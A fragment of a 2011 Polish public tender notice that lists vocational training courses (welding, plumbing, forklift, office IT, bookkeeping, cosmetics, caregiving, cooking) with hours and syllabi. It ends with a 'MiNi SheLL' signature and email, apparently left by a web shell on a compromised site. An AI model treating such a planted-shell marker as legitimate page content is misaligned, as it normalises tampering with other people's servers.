SPAWANIE BLACH I RUR SPOINAMI PACHWINOWYMI MET. TIG (141)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 136. Szkolenie winno zawierać następujące przedmioty nauczania:
	Zagadnienia z zakresu procesów spawalniczych, 
	Technika spawania;
	Technologia spawania;
	Urządzenia i materiały do spawania
Program zgodny z wytycznymi Instytutu Spawalnictwa, poszerzony przez jednostkę szkoleniową o dodatkowe godziny zajęć praktycznych.

Absolwenci uzyskają uprawnienia wydane przez Instytut Spawalnictwa.

Zamówienie obejmuje przeszkolenie łącznie 15 osób i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> CZĘŚĆ IX

TECHNOLOG ROBÓT WYKOŃCZENIOWYCH..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 300. Szkolenie winno zawierać następujące przedmioty nauczania:

	BHP na placu budowy
	Prace z zastosowaniem płyt gipsowo-kartonowych
	Montaż sufitów podwieszanych i ścianek działowych
	Posadzki z płyt ceramicznych i granitowo-marmurowych
	Wykończeniowe prace podłogowe
	Malowanie dekoracyjne
	Prace murarskie
	Glazura ścienna, 
	Tynki szlachetne
	Kalkulacja i obmiar robót
	Pierwsza pomoc przedlekarska

Zamówienie obejmuje przeszkolenie łącznie 10 osób i  realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> CZĘŚĆ X 

UPRAWNIENIA SEP DO 1 kV Z POMIARAMI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 60. Szkolenie winno zawierać następujące przedmioty nauczania:

	Materiałoznawstwo, 
	instalacje elektroenergetyczne, 
	eksploatacja instalacji elektroenergetycznych, 
	zasady BHP i przeciwpożarowe,
	ratownictwo,
	pomiary eksploatacyjne.

Zamówienie obejmuje przeszkolenie łącznie 10 osób i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> CZĘŚĆ XI 

MONTER INSTALACJI WOD-KAN-GAZ  I CO Z UPRAWNIENIAMI GAZOWYMI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 350. Szkolenie winno zawierać następujące przedmioty nauczania:

	instalacja wod.-kan.-gaz., 
	elementy składowe, 
	rodzaje rysunku zawodowego instalacji sanitarnej, 
	czytanie projektu technicznego, 
	rury i kształtki miedziane, 
	rodzaje armatury, 
	narzędzia pomiarowe,
	przygotowanie wykopów, układanie rur w wykopach
	lutowanie miedzi i zgrzewanie tworzyw sztucznych,
	przepisy BHP,
	pierwsza pomoc przedlekarska

Absolwenci szkolenia otrzymają świadectwo kwalifikacyjne EG-3.

Zamówienie obejmuje przeszkolenie łącznie 15 osób i realizowane będzie w terminie podanym przez Zamawiającego,  od podpisania umowy do 31 października 2011  r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> CZĘŚĆ XII  

OPERATOR WÓZKA JEZDNIOWEGO Z MODUŁEM WYMIANY BUTLI GAZOWEJ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 67. Szkolenie winno zawierać następujące przedmioty nauczania:

	Typy stosowanych wózków widłowych,
	Budowa wózka
	Czynności  kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami
	Czynności kierowcy w czasie pracy
	Wiadomości z zakresu ładunkoznawstwa
	Wiadomości z zakresu BHP, o dozorze technicznym,
	Przygotowanie kierowcy do wykonywania czynności wymiany butli
	Praktyczna nauka jazdy - 15 godz.
	- jazda wózkiem jezdniowym bez obciążenia przód, tył, ósemkowanie, jazda do celu;
	- jazda wózkiem jezdniowym bez i z obciążeniem przód, tył, ósemkowanie, jazda do 
	celu;
	- jazda wózkiem jezdniowym z obciążeniem przód, tył, ósemkowanie, jazda do celu, 	paletowanie, wysokie składowanie.

Zamówienie obejmuje przeszkolenie łącznie 10 osób i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> CZĘŚĆ XIII 

OFFICE FOR WINDOWS Z MODUŁEM OBSŁUGI INTERNETU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 200. Szkolenie winno zawierać następujące przedmioty nauczania:

	podstawy obsługi komputera; 
	system operacyjny Windows; 
	edytor tekstu MS Word;  
	maszynopisanie komputerowe i korespondencja biurowa;  
	arkusz kalkulacyjny MS Excel;  
	Bazy danych Access;
	Tworzenie prezentacji Power Point;
	Internet i poczta elektroniczna;  

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa i realizowane będzie             w terminie podanym przez Zamawiającego, od podpisania umowy do                                       31 października 2011  r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> CZĘŚĆ XIV 

PODSTAWY OBSŁUGI KOMPUTERA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 150. Szkolenie winno zawierać następujące przedmioty nauczania:

	podstawowe informacje o sprzęcie komputerowym,
	budowa i działanie komputera, 
	logowanie do systemu, 
	tworzenie użytkowników, 
	operacje na oknach i ikonach , 
	ustawianie właściwości systemu, 
	praca w środowisku MS Windows, 
	edycja tekstów MS Word, 
	arkusz kalkulacyjny -  MS Excel, 
	obsługa i wykorzystanie sieci Internet, 
	poczta elektroniczna . 

Zamówienie obejmuje przeszkolenie łącznie 10 osób i realizowane będzie w terminie podanym przez Zamawiającego, od podpisania umowy do 31  października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> CZĘŚĆ XV 

PRACOWNIK ADMINISTRACYJNO-BIUROWY Z MODUŁEM KADR I PŁAC..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 300. Szkolenie winno zawierać następujące przedmioty nauczania:

	Prowadzenie dokumentacji biurowej w tym archiwizacja dokumentów
	organizacja pracy w biurze
	podstawy księgowości, prowadzenie księgi przychodów  i rozchodów,
	klasyfikacja podstawowych podmiotów gospodarczych i usytuowanie w nich działu kadr i płac
	wybrane zagadnienia z prawa pracy, prawa cywilnego i administracyjnego
	kadry
	ubezpieczenia społeczne
	płace
	obsługa komputera
	program PŁATNIK
	pierwsza pomoc przedlekarska

Zamówienie obejmuje przeszkolenie łącznie 15 osób i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> CZĘŚĆ XVI

PROWADZENIE KSIĘGI PRZYCHODÓW I ROZCHODÓW                                                Z WYKORZYSTANIEM KOMPUTERA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 240. Szkolenie winno zawierać następujące przedmioty nauczania:

	Podstawy księgowości,
	Podmioty prowadzące podatkową księgę przychodów i rozchodów oraz ich dodatkowe zobowiązania;
	Zasady otwierania księgi przychodów i rozchodów;
	Dowody księgowe w księdze przychodów i rozchodów;
	Zasady prowadzenia ewidencji wyposażenia, środków trwałych oraz wartości niematerialnych i prawnych;
	Zasady sporządzania kart przychodów pracowników;
	Zasady prowadzenia pozostałych ewidencji dodatkowych;
	Zasady ewidencji przychodów oraz kosztów ich uzyskania w podatkowej księdze przychodów i rozchodów;
	Zasady zamknięcia podatkowej księgi przychodów i rozchodów;
	Obsługa komputera;
	Rozpoznanie możliwości programu komputerowego do prowadzenia księgi przychodów    i rozchodów;
	Założenie księgi przychodów i rozchodów w programie komputerowym;
	Wprowadzenie ewidencji dodatkowych;
	Ewidencja zdarzeń gospodarczych na podstawie dokumentów księgowych;
	Rozliczanie przedsiębiorstwa z otoczeniem, Urzędem Skarbowym i z ZUS za pośrednictwem programu PŁATNIK.

Zamówienie obejmuje przeszkolenie łącznie 10 osób i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 31 października 2011  r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> CZĘŚĆ XVII 

SPRZEDAWCA - HANDLOWIEC..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 200. Szkolenie winno zawierać  następujące przedmioty nauczania:
	Organizacja i technika sprzedaży,
	Towaroznawstwo,
	Podstawy rachunkowości,
	Podstawy obsługi komputera i komputerowe programy handlowe,
	Obsługa kas fiskalnych,
	Szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywności
	Pierwsza pomoc przedlekarska

Zamówienie obejmuje przeszkolenie łącznie 30 osób, w trzech grupach dziesięcioosobowych         i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> CZĘŚĆ XVIII

KOSMETYKA ZACHOWAWCZO - UPIĘKSZAJĄCA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 350. Szkolenie winno zawierać następujące przedmioty nauczania:
	Kosmetologia;
	Anatomia;
	Dermatologia;
	Chemia kosmetyczna;
	Masaż;
	Fizykoterapia;
	Dietetyka;
	Higiena;
	Obsługa klienta;
	Zajęcia praktyczne:
	Określanie i ustalanie kształtu łuku brwiowego dla danego kształtu twarzy;
	Rozpoznawanie rodzaju cery;
	Wykonywanie klasycznych zabiegów pielęgnacyjnych przeznaczonych do 	podstawowych  rodzajów cery;
	Wykonywanie depilacji ciepłym woskiem kończyn dolnych  i górnych; 
	Wykonywanie depilacji ciepłym woskiem dołów pachowych, strefy bikini i wąsików;
	Przeprowadzenie diagnozy stanu skóry, biustu, ramion, łokci, kolan;
	Dermbrazja;
	Elementy wirażu;
	BHP;
	Pierwsza pomoc przedlekarska .

Zamówienie obejmuje przeszkolenie łącznie 10 osób i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 30 września 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> CZĘŚĆ XIX

MANICURE - PEDICURE ZE STYLIZACJĄ PAZNOKCI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 250. Szkolenie winno zawierać następujące przedmioty nauczania:
	Anatomia dłoni i stopy
	dermatologiczne schorzenie dłoni, stóp, paznokci
	pedicure kosmetyczny 
	manicure kosmetyczny
	nowoczesne metody przedłużania paznokci
	przedłużanie paznokci metodą żeli światłoutwardzalnych
	przedłużanie paznokci metodą akrylową
	korekta paznokci metodą żelową
	zdobnictwo paznokci
	pierwsza pomoc przedlekarska

Każdy z uczestników szkolenia będzie miał zapewnione stanowisko pracy w pełni wyposażone  we wszelkie potrzebne produkty, przyrządy (cążki, cęgi, gilotyna, frezy, pędzelki itp.)                   i urządzenia kosmetyczne niezbędne do nauki poszczególnych zabiegów, lampa uv,   profesjonalna frezarka, lampka bezcieniowa na stoliku, parafiniarki, lampa lupa), jak również niezbędne środki higieniczne oraz materiały do zdobnictwa paznokci i nakładania tipsów. 
Zamówienie obejmuje przeszkolenie łącznie 10 osób i realizowane będzie w terminie wskazanym przez Zamawiającego,  od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> CZĘŚĆ XX

OPIEKUNKA OSÓB STARSZYCH, NIEPEŁNOSPRAWNYCH I DZIECI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 240. Szkolenie winno zawierać  następujące przedmioty nauczania:

	praca opiekuńcza /podstawy prawne pracy socjalnej, etyka pracy socjalnej/
	sposoby komunikacji z podopiecznymi;
	empatia;
	radzenie sobie z trudnymi rozmowami i sytuacjami;
	trening asertywności;
	radzenie sobie ze stresem;
	warsztaty terapii zajęciowej;
	podstawy anatomii i fizjologii człowieka;
	podstawy rehabilitacji;
	podstawy masażu leczniczego;
	podstawy dietetyki;
	podstawy pielęgnacji chorych;
	podstawy opieki nad niemowlęciem i dzieckiem;
	elementy patologii chorób wieku starszego;
	opieka nad osobami uzależnionymi
	pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie łącznie 20 osób w dwóch grupach dziesięcioosobowych i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> CZĘŚĆ XXI

KUCHARZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 160. Szkolenie winno zawierać następujące przedmioty nauczania:

	Zasady żywienia
	przygotowanie stanowiska pracy w kuchni
	technika mycia maszyn i urządzeń kuchennych, konserwacja maszyn
	obróbka termiczna: gotowanie, smażenie, pieczenie, duszenie
	towaroznawstwo
	wiadomości BHP w gastronomii
	rysunek dekoracyjny
	potrawy specjalistyczne
	zajęcia praktyczne
	obsługa kas fiskalnych
	pierwsza pomoc przedlekarska

Zamówienie obejmuje przeszkolenie łącznie 10 osób i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com